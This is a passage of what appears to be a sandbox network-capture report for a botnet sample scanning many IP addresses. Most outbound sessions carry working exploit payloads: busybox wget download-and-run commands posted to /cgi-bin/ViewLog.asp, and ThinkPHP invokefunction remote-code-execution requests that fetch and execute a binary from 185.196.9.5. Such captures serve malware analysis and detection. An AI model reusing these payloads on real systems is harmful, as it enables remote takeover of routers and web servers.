Feb 25, 2024 19:04:08.938591003 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
691	192.168.2.15	58558	31.31.54.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.866498947 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
692	192.168.2.15	39630	94.122.208.152	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.885953903 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
693	192.168.2.15	54600	95.86.102.185	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.906363964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
694	192.168.2.15	53094	94.123.22.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.906539917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
695	192.168.2.15	58164	94.122.10.107	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.920887947 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
696	192.168.2.15	33650	95.128.85.103	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:09.162522078 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:09.353010893 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:09 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
697	192.168.2.15	44462	95.131.78.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:09.167608023 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
698	192.168.2.15	42132	95.125.153.104	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:09.203481913 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:09.433638096 CET	106	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain Content-Length: 370 Connection: close
Feb 25, 2024 19:04:09.434067965 CET	382	IN	Data Raw: 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 0a 43 61 6e 6e 6f 74 20 70 61 72 73 65 20 48 54 54 50 20 72 65 71 75 65 73 74 3a 20 5b 47 45 54 20 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 Data Ascii: Error 400: Bad RequestCannot parse HTTP request: [GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp Think

Session ID	Source IP	Source Port	Destination IP	Destination Port
699	192.168.2.15	36770	95.12.199.236	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:09.208605051 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:09.447040081 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 02:04:07 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
700	192.168.2.15	53256	95.85.76.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.663445950 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.879821062 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
701	192.168.2.15	49888	95.101.155.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.676316977 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.888319969 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:10 GMT Date: Sun, 25 Feb 2024 18:04:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 30 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 35 30 26 23 34 36 3b 38 34 32 63 64 39 36 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.205a1602.1708884250.842cd960</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
702	192.168.2.15	44268	95.86.93.65	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.688249111 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
703	192.168.2.15	52480	95.101.196.246	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.704365015 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.956232071 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:10 GMT Date: Sun, 25 Feb 2024 18:04:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 34 37 37 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 35 30 26 23 34 36 3b 65 38 36 37 38 39 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.14771302.1708884250.e867894</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
704	192.168.2.15	60010	95.178.84.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.721126080 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.990398884 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:10 GMT Date: Sun, 25 Feb 2024 18:04:10 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 36 35 34 62 32 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 32 35 30 26 23 34 36 3b 62 34 38 62 31 65 65 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2654b25f.1708884250.b48b1ee3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
705	192.168.2.15	58618	95.56.130.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.724684000 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.996759892 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:10.999108076 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
706	192.168.2.15	37168	88.99.226.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.846014977 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:11.035640955 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:10 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
707	192.168.2.15	53768	88.201.212.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:10.885142088 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:11.094768047 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:04:05 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
708	192.168.2.15	34126	62.29.12.55	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.413924932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
709	192.168.2.15	32840	94.122.21.183	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.413958073 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
710	192.168.2.15	37826	94.123.102.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.413999081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
711	192.168.2.15	56598	31.200.93.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.414019108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
712	192.168.2.15	39730	95.86.118.231	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.414052010 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
713	192.168.2.15	58084	94.120.50.223	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.414076090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
714	192.168.2.15	53918	31.41.167.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:11.414132118 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.653842926 CET	469	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'none' Strict-Transport-Security: max-age=3600 Content-Length: 130 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server 